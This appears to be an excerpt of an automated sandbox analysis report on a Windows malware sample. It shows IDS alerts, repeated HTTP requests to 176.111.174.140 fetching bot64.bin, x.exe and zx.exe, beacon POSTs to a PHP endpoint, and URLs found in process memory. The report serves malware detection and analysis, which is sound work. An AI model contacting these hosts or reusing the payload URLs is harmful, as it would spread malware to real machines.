Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49737 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49738 -> 176.111.174.140:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 32
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831C20 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00007FF63A831C20
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: unknown HTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: explorer.exe, 00000004.00000000.1851675357.000000000C964000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/
Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/3
Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/C
Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/W
Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000004.00000003.2514758574.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853072283.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853217838.000000000CB43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3084100144.000000000CA86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2514169322.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853574308.000000000F09D000.00000004.00000001.00020000.00000000.sdmp, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe String found in binary or memory: http://176.111.174.140/bin/bot64.bin
Source: explorer.exe, 00000004.00000000.1853217838.000000000CB43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.bin0
Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.bin69
Source: explorer.exe, 00000004.00000000.1853072283.000000000CA42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.binF
Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.binID
Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.binem32
